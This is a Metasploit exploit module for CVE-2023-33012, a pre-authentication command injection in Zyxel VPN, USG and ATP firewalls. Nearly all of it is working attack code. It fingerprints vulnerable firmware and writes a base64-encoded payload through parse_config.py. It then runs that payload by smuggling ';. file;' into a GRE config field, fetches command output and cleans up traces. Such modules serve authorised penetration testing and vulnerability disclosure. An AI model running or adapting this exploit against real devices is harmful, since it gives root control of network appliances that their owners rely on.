Zyxel parse_config.py Command Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Zyxel parse_config.py Command Injection',  
'Description' => %q{  
This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.  
The affected firmware versions depend on the device module, see this module's documentation for more details.  
  
Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.  
If you run into any issues testing this in a real environment we kindly ask you raise an issue in  
metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose  
},  
'Author' => [  
'SSD Secure Disclosure technical team', # discovery  
'jheysel-r7' # Msf module  
],  
'References' => [  
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],  
[ 'CVE', '2023-33012']  
],  
'License' => MSF_LICENSE,  
'Platform' => ['linux', 'unix'],  
'Privileged' => true,  
'Arch' => [ ARCH_CMD ],  
'Targets' => [  
[ 'Automatic Target', {}]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2024-01-24',  
'Notes' => {  
'Stability' => [ CRASH_SAFE, ],  
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],  
'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot  
}  
)  
)  
  
register_options(  
[  
OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),  
]  
)  
end  
  
def check  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')  
})  
return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?  
  
if res.code == 200  
product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)  
version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)  
  
if product_match && version_match  
product = product_match[1]  
version = version_match[1]  
  
if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||  
(product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||  
(product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||  
(product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))  
return CheckCode::Appears("Product: #{product}, Version: #{version}")  
else  
return CheckCode::Safe("Product: #{product}, Version: #{version}")  
end  
end  
end  
CheckCode::Unknown('Version and product info were unable to be determined.')  
end  
  
def on_new_session(session)  
super  
command_output = ''  
# Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.  
if session.type.to_s.eql? 'meterpreter'  
newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""  
print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")  
command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""  
elsif session.type.to_s.eql? 'shell'  
newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"  
print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")  
command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"  
end  
  
if command_output.include?('success')  
print_good('The GRE interface was successfully removed.')  
else  
print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')  
end  
end  
  
def exploit  
# Command injection has a 0x14 byte length limit so keep the file name as small as possible.  
# The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.  
filename = rand_text_alpha(1)  
payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"  
  
command = payload.raw  
command += ' '  
command += <<~CMD  
2>/var/log/ztplog 1>/var/log/ztplog  
(sleep 10 && /bin/rm -rf #{payload_filepath}) &  
CMD  
command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"  
  
file_write_pload = "option proto vti\n"  
file_write_pload += "option #{command};exit\n"  
file_write_pload += "option name 1\n"  
  
config = Base64.strict_encode64(file_write_pload)  
data = { 'config' => config, 'fqdn' => "\x00" }  
print_status('Attempting to upload the payload via QSR file write...')  
  
file_write_res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),  
'data' => data.to_s  
})  
unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')  
fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')  
end  
  
register_files_for_cleanup(payload_filepath)  
print_good("File write was successful, uploaded: #{payload_filepath}")  
  
cmd_injection_pload = "option proto gre\n"  
cmd_injection_pload += "option name 0\n"  
cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"  
cmd_injection_pload += "option netmask 24\n"  
cmd_injection_pload += "option gateway 0\n"  
cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"  
cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"  
config = Rex::Text.encode_base64(cmd_injection_pload)  
data = { 'config' => config, 'fqdn' => "\x00" }  
  
cmd_injection_res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),  
'data' => data.to_s  
})  
  
# If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)  
# we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.  
if payload_instance.connection_type == 'none'  
cmd_output_res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')  
})  
  
if cmd_output_res&.body && !cmd_output_res.body.empty?  
output = cmd_output_res.body.split("</head>\n<body>")[1]  
output = output.split("</body>\n</html>")[0]  
output = output.gsub("\n\n<br>", '')  
output = output.gsub("[IPC]IPC result: 1\n", '')  
print_good("Command output: #{output}")  
else  
print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")  
end  
end  
  
unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')  
fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')  
end  
end  
end  
`